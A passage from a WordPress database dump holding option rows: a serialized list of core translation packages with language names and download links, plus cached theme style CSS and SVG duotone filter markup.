21:41:29\";s:12:\"english_name\";s:6:\"Pashto\";s:11:\"native_name\";s:8:\"پښتو\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.3.30/ps.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ps\";i:2;s:3:\"pus\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:19:\"دوام ورکړه\";}}s:5:\"pt_BR\";a:8:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2023-01-08 13:50:14\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/pt_BR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"pt\";i:2;s:3:\"por\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"pt_AO\";a:8:{s:8:\"language\";s:5:\"pt_AO\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-10-01 12:16:29\";s:12:\"english_name\";s:19:\"Portuguese (Angola)\";s:11:\"native_name\";s:20:\"Português de Angola\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/pt_AO.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"pt\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"pt_PT\";a:8:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2023-01-09 08:47:14\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/pt_PT.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"pt\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:10:\"pt_PT_ao90\";a:8:{s:8:\"language\";s:10:\"pt_PT_ao90\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-08-09 12:26:21\";s:12:\"english_name\";s:27:\"Portuguese (Portugal, AO90)\";s:11:\"native_name\";s:17:\"Português (AO90)\";s:7:\"package\";s:69:\"https://downloads.wordpress.org/translation/core/6.1.1/pt_PT_ao90.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"pt\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:3:\"rhg\";a:8:{s:8:\"language\";s:3:\"rhg\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-03-16 13:03:18\";s:12:\"english_name\";s:8:\"Rohingya\";s:11:\"native_name\";s:8:\"Ruáinga\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/rhg.zip\";s:3:\"iso\";a:1:{i:3;s:3:\"rhg\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"ro_RO\";a:8:{s:8:\"language\";s:5:\"ro_RO\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2023-01-05 04:37:02\";s:12:\"english_name\";s:8:\"Romanian\";s:11:\"native_name\";s:8:\"Română\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/ro_RO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ro\";i:2;s:3:\"ron\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuă\";}}s:5:\"ru_RU\";a:8:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2023-01-25 17:58:11\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/ru_RU.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ru\";i:2;s:3:\"rus\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Продолжить\";}}s:3:\"sah\";a:8:{s:8:\"language\";s:3:\"sah\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-21 02:06:41\";s:12:\"english_name\";s:5:\"Sakha\";s:11:\"native_name\";s:14:\"Сахалыы\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/sah.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"sah\";i:3;s:3:\"sah\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Салҕаа\";}}s:3:\"snd\";a:8:{s:8:\"language\";s:3:\"snd\";s:7:\"version\";s:6:\"5.4.12\";s:7:\"updated\";s:19:\"2020-07-07 01:53:37\";s:12:\"english_name\";s:6:\"Sindhi\";s:11:\"native_name\";s:8:\"سنڌي\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/5.4.12/snd.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"sd\";i:2;s:3:\"snd\";i:3;s:3:\"snd\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:15:\"اڳتي هلو\";}}s:5:\"si_LK\";a:8:{s:8:\"language\";s:5:\"si_LK\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-11-12 06:00:52\";s:12:\"english_name\";s:7:\"Sinhala\";s:11:\"native_name\";s:15:\"සිංහල\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/si_LK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"si\";i:2;s:3:\"sin\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:44:\"දිගටම කරගෙන යන්න\";}}s:5:\"sk_SK\";a:8:{s:8:\"language\";s:5:\"sk_SK\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2023-01-20 04:27:59\";s:12:\"english_name\";s:6:\"Slovak\";s:11:\"native_name\";s:11:\"Slovenčina\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/sk_SK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sk\";i:2;s:3:\"slk\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Pokračovať\";}}s:3:\"skr\";a:8:{s:8:\"language\";s:3:\"skr\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-11-06 09:43:42\";s:12:\"english_name\";s:7:\"Saraiki\";s:11:\"native_name\";s:14:\"سرائیکی\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1.1/skr.zip\";s:3:\"iso\";a:1:{i:3;s:3:\"skr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:17:\"جاری رکھو\";}}s:5:\"sl_SI\";a:8:{s:8:\"language\";s:5:\"sl_SI\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-11-11 12:48:55\";s:12:\"english_name\";s:9:\"Slovenian\";s:11:\"native_name\";s:13:\"Slovenščina\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/sl_SI.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sl\";i:2;s:3:\"slv\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Nadaljuj\";}}s:2:\"sq\";a:8:{s:8:\"language\";s:2:\"sq\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-11-18 19:47:58\";s:12:\"english_name\";s:8:\"Albanian\";s:11:\"native_name\";s:5:\"Shqip\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.1.1/sq.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sq\";i:2;s:3:\"sqi\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Vazhdo\";}}s:5:\"sr_RS\";a:8:{s:8:\"language\";s:5:\"sr_RS\";s:7:\"version\";s:5:\"5.8.6\";s:7:\"updated\";s:19:\"2021-08-01 21:21:06\";s:12:\"english_name\";s:7:\"Serbian\";s:11:\"native_name\";s:23:\"Српски језик\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/5.8.6/sr_RS.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sr\";i:2;s:3:\"srp\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:14:\"Настави\";}}s:5:\"sv_SE\";a:8:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2023-01-24 23:38:28\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/sv_SE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sv\";i:2;s:3:\"swe\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Fortsätt\";}}s:2:\"sw\";a:8:{s:8:\"language\";s:2:\"sw\";s:7:\"version\";s:6:\"5.3.14\";s:7:\"updated\";s:19:\"2019-10-13 15:35:35\";s:12:\"english_name\";s:7:\"Swahili\";s:11:\"native_name\";s:9:\"Kiswahili\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/5.3.14/sw.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sw\";i:2;s:3:\"swa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Endelea\";}}s:3:\"szl\";a:8:{s:8:\"language\";s:3:\"szl\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-09-24 19:58:14\";s:12:\"english_name\";s:8:\"Silesian\";s:11:\"native_name\";s:17:\"Ślōnskŏ gŏdka\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/szl.zip\";s:3:\"iso\";a:1:{i:3;s:3:\"szl\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:13:\"Kōntynuować\";}}s:5:\"ta_IN\";a:8:{s:8:\"language\";s:5:\"ta_IN\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-27 03:22:47\";s:12:\"english_name\";s:5:\"Tamil\";s:11:\"native_name\";s:15:\"தமிழ்\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/ta_IN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ta\";i:2;s:3:\"tam\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:24:\"தொடரவும்\";}}s:5:\"ta_LK\";a:8:{s:8:\"language\";s:5:\"ta_LK\";s:7:\"version\";s:6:\"4.2.34\";s:7:\"updated\";s:19:\"2015-12-03 01:07:44\";s:12:\"english_name\";s:17:\"Tamil (Sri Lanka)\";s:11:\"native_name\";s:15:\"தமிழ்\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/4.2.34/ta_LK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ta\";i:2;s:3:\"tam\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:18:\"தொடர்க\";}}s:2:\"te\";a:8:{s:8:\"language\";s:2:\"te\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-26 15:47:39\";s:12:\"english_name\";s:6:\"Telugu\";s:11:\"native_name\";s:18:\"తెలుగు\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/te.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"te\";i:2;s:3:\"tel\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:30:\"కొనసాగించు\";}}s:2:\"th\";a:8:{s:8:\"language\";s:2:\"th\";s:7:\"version\";s:5:\"5.8.6\";s:7:\"updated\";s:19:\"2022-06-08 04:30:30\";s:12:\"english_name\";s:4:\"Thai\";s:11:\"native_name\";s:9:\"ไทย\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/5.8.6/th.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"th\";i:2;s:3:\"tha\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:15:\"ต่อไป\";}}s:2:\"tl\";a:8:{s:8:\"language\";s:2:\"tl\";s:7:\"version\";s:6:\"4.8.21\";s:7:\"updated\";s:19:\"2017-09-30 09:04:29\";s:12:\"english_name\";s:7:\"Tagalog\";s:11:\"native_name\";s:7:\"Tagalog\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.8.21/tl.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"tl\";i:2;s:3:\"tgl\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Magpatuloy\";}}s:5:\"tr_TR\";a:8:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2023-01-04 13:32:22\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/tr_TR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"tr\";i:2;s:3:\"tur\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Devam\";}}s:5:\"tt_RU\";a:8:{s:8:\"language\";s:5:\"tt_RU\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-11-20 20:20:50\";s:12:\"english_name\";s:5:\"Tatar\";s:11:\"native_name\";s:19:\"Татар теле\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/tt_RU.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"tt\";i:2;s:3:\"tat\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:17:\"дәвам итү\";}}s:3:\"tah\";a:8:{s:8:\"language\";s:3:\"tah\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-03-06 18:39:39\";s:12:\"english_name\";s:8:\"Tahitian\";s:11:\"native_name\";s:10:\"Reo Tahiti\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/tah.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"ty\";i:2;s:3:\"tah\";i:3;s:3:\"tah\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"ug_CN\";a:8:{s:8:\"language\";s:5:\"ug_CN\";s:7:\"version\";s:6:\"4.9.22\";s:7:\"updated\";s:19:\"2021-07-03 18:41:33\";s:12:\"english_name\";s:6:\"Uighur\";s:11:\"native_name\";s:16:\"ئۇيغۇرچە\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/4.9.22/ug_CN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ug\";i:2;s:3:\"uig\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:26:\"داۋاملاشتۇرۇش\";}}s:2:\"uk\";a:8:{s:8:\"language\";s:2:\"uk\";s:7:\"version\";s:5:\"6.0.3\";s:7:\"updated\";s:19:\"2022-09-11 15:51:48\";s:12:\"english_name\";s:9:\"Ukrainian\";s:11:\"native_name\";s:20:\"Українська\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.0.3/uk.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"uk\";i:2;s:3:\"ukr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Продовжити\";}}s:2:\"ur\";a:8:{s:8:\"language\";s:2:\"ur\";s:7:\"version\";s:6:\"5.4.12\";s:7:\"updated\";s:19:\"2020-04-09 11:17:33\";s:12:\"english_name\";s:4:\"Urdu\";s:11:\"native_name\";s:8:\"اردو\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/5.4.12/ur.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ur\";i:2;s:3:\"urd\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:19:\"جاری رکھیں\";}}s:5:\"uz_UZ\";a:8:{s:8:\"language\";s:5:\"uz_UZ\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2021-02-28 12:02:22\";s:12:\"english_name\";s:5:\"Uzbek\";s:11:\"native_name\";s:11:\"O‘zbekcha\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/translation/core/5.8-beta/uz_UZ.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"uz\";i:2;s:3:\"uzb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:11:\"Davom etish\";}}s:2:\"vi\";a:8:{s:8:\"language\";s:2:\"vi\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-12-17 10:13:02\";s:12:\"english_name\";s:10:\"Vietnamese\";s:11:\"native_name\";s:14:\"Tiếng Việt\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.1.1/vi.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"vi\";i:2;s:3:\"vie\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Tiếp tục\";}}s:5:\"zh_CN\";a:8:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-12-18 06:20:30\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/zh_CN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"zh\";i:2;s:3:\"zho\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"继续\";}}s:5:\"zh_TW\";a:8:{s:8:\"language\";s:5:\"zh_TW\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-11-15 22:21:52\";s:12:\"english_name\";s:16:\"Chinese (Taiwan)\";s:11:\"native_name\";s:12:\"繁體中文\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/zh_TW.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"zh\";i:2;s:3:\"zho\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"繼續\";}}s:5:\"zh_HK\";a:8:{s:8:\"language\";s:5:\"zh_HK\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-07-15 15:25:03\";s:12:\"english_name\";s:19:\"Chinese (Hong Kong)\";s:11:\"native_name\";s:12:\"香港中文\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/zh_HK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"zh\";i:2;s:3:\"zho\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"繼續\";}}}','no'),(285998,'_transient_timeout_global_styles_vega','1675209572','no'),(285999,'_transient_global_styles_vega','body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--duotone--dark-grayscale: url(\'#wp-duotone-dark-grayscale\');--wp--preset--duotone--grayscale: url(\'#wp-duotone-grayscale\');--wp--preset--duotone--purple-yellow: url(\'#wp-duotone-purple-yellow\');--wp--preset--duotone--blue-red: url(\'#wp-duotone-blue-red\');--wp--preset--duotone--midnight: url(\'#wp-duotone-midnight\');--wp--preset--duotone--magenta-yellow: url(\'#wp-duotone-magenta-yellow\');--wp--preset--duotone--purple-green: url(\'#wp-duotone-purple-green\');--wp--preset--duotone--blue-orange: url(\'#wp-duotone-blue-orange\');--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;}:where(.is-layout-flex){gap: 0.5em;}body .is-layout-flow > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-flow > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-flow > .aligncenter{margin-left: auto !important;margin-right: auto !important;}body .is-layout-constrained > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-constrained > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-constrained > .aligncenter{margin-left: auto !important;margin-right: auto !important;}body .is-layout-constrained > :where(:not(.alignleft):not(.alignright):not(.alignfull)){max-width: var(--wp--style--global--content-size);margin-left: auto !important;margin-right: auto !important;}body .is-layout-constrained > .alignwide{max-width: var(--wp--style--global--wide-size);}body .is-layout-flex{display: flex;}body .is-layout-flex{flex-wrap: wrap;align-items: center;}body .is-layout-flex > *{margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}','no'),(286000,'_transient_timeout_global_styles_svg_filters_vega','1675209573','no'),(286001,'_transient_global_styles_svg_filters_vega','<svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 0 0\" width=\"0\" height=\"0\" focusable=\"false\" role=\"none\" style=\"visibility: hidden; position: absolute; left: -9999px; overflow: hidden;\" ><defs><filter id=\"wp-duotone-dark-grayscale\"><feColorMatrix color-interpolation-filters=\"sRGB\" type=\"matrix\" values=\" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 \" /><feComponentTransfer color-interpolation-filters=\"sRGB\" ><feFuncR type=\"table\" tableValues=\"0 0.49803921568627\" /><feFuncG type=\"table\" tableValues=\"0 0.49803921568627\" /><feFuncB type=\"table\" tableValues=\"0 0.49803921568627\" /><feFuncA type=\"table\" tableValues=\"1 1\" /></feComponentTransfer><feComposite in2=\"SourceGraphic\" operator=\"in\" /></filter></defs></svg><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 0 0\" width=\"0\" height=\"0\" focusable=\"false\" role=\"none\" style=\"visibility: hidden; position: absolute; left: -9999px; overflow: hidden;\" ><defs><filter id=\"wp-duotone-grayscale\"><feColorMatrix color-interpolation-filters=\"sRGB\" type=\"matrix\" values=\" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 \" /><feComponentTransfer color-interpolation-filters=\"sRGB\" ><feFuncR type=\"table\" tableValues=\"0 1\" /><feFuncG type=\"table\" tableValues=\"0 1\" /><feFuncB type=\"table\" tableValues=\"0 1\" /><feFuncA type=\"table\" tableValues=\"1 1\" /></feComponentTransfer><feComposite in2=\"SourceGraphic\" operator=\"in\" /></filter></defs></svg><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 0 0\" width=\"0\" height=\"0\" focusable=\"false\" role=\"none\" style=\"visibility: hidden; position: absolute; left: -9999px; overflow: hidden;\" ><defs><filter id=\"wp-duotone-purple-yellow\"><feColorMatrix color-interpolation-filters=\"sRGB\" type=\"matrix\" values=\" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 \" /><feComponentTransfer color-interpolation-filters=\"sRGB\" ><feFuncR type=\"table\" tableValues=\"0.54901960784314 0.98823529411765\" /><feFuncG type=\"table\" 